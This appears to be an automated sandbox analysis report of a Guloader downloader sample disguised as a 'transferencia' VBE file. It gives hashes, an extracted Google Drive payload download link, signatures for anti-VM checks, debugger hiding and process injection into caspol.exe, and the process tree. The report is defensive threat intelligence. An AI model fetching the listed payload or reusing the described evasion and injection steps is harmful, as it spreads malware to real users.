Analysis
- max time kernel: 148s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-02-2023 11:29
Static task: static1
Behavioral task: behavioral1
- Sample: transferencia.....vbe
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: transferencia.....vbe
- Resource: win10v2004-20220812-en
General
- Target: transferencia.....vbe
- Size: 60KB
- MD5: 880b795347b76a1660b3dfcae7bc28f7
- SHA1: dd398c1781ddd4f3e69036f4dadde6c643cacd44
- SHA256: c1435f8fc9a6ffb253811a74d4016f73248b7226d6d5b458c3bf960ee3a38005
- SHA512: e3ff92ca5ed3cc63bd8e1213a79dfc2574e0e39a126ece3d5890062eccc56ba23efe8f4301e71e3ad1fd3b1f88f9253e8d16d3fe0b73d5e78530f25cd80a7ccc
- SSDEEP: 768:FlRe1yyO99pKzl2VT1Gxxy4tH/dD/ASEGZU2L7Y+yk10iGfzi945EriK:F3GyvLpylJxdfawKQNVMErd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl
Signatures
-
Guloader, Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exe
flow | pid | process
14 | 4492 | powershell.exe
16 | 4492 | powershell.exe
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exe, caspol.exe
description | ioc | process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | caspol.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
63 | api.ipify.org
64 | api.ipify.org
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exe
pid | process
3512 | caspol.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exe, caspol.exe
pid | process
4492 | powershell.exe
3512 | caspol.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exe
description | pid | process | target process
PID 4492 set thread context of 3512 | 4492 | powershell.exe | caspol.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exe
pid | pid_target | process | target process
3108 | 3512 | WerFault.exe | caspol.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe, powershell.exe
pid | process
4932 | powershell.exe
4932 | powershell.exe
4492 | powershell.exe
4492 | powershell.exe
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exe
pid | process
4492 | powershell.exe
4492 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exe, powershell.exe, caspol.exe
description | pid | process
Token: SeDebugPrivilege | 4932 | powershell.exe
Token: SeDebugPrivilege | 4492 | powershell.exe
Token: SeDebugPrivilege | 3512 | caspol.exe
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WScript.exe, powershell.exe, powershell.exe
description | pid | process | target process
PID 4864 wrote to memory of 928 | 4864 | WScript.exe | cmd.exe
PID 4864 wrote to memory of 928 | 4864 | WScript.exe | cmd.exe
PID 4864 wrote to memory of 4932 | 4864 | WScript.exe | powershell.exe
PID 4864 wrote to memory of 4932 | 4864 | WScript.exe | powershell.exe
PID 4932 wrote to memory of 4492 | 4932 | powershell.exe | powershell.exe
PID 4932 wrote to memory of 4492 | 4932 | powershell.exe | powershell.exe
PID 4932 wrote to memory of 4492 | 4932 | powershell.exe | powershell.exe
PID 4492 wrote to memory of 4732 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 4732 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 4732 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 3512 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 3512 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 3512 | 4492 | powershell.exe | caspol.exe
PID 4492 wrote to memory of 3512 | 4492 | powershell.exe | caspol.exe
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\transferencia.....vbe" 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe cmd /c echo shell 2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 2180 5⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3512 -ip 3512 1⤵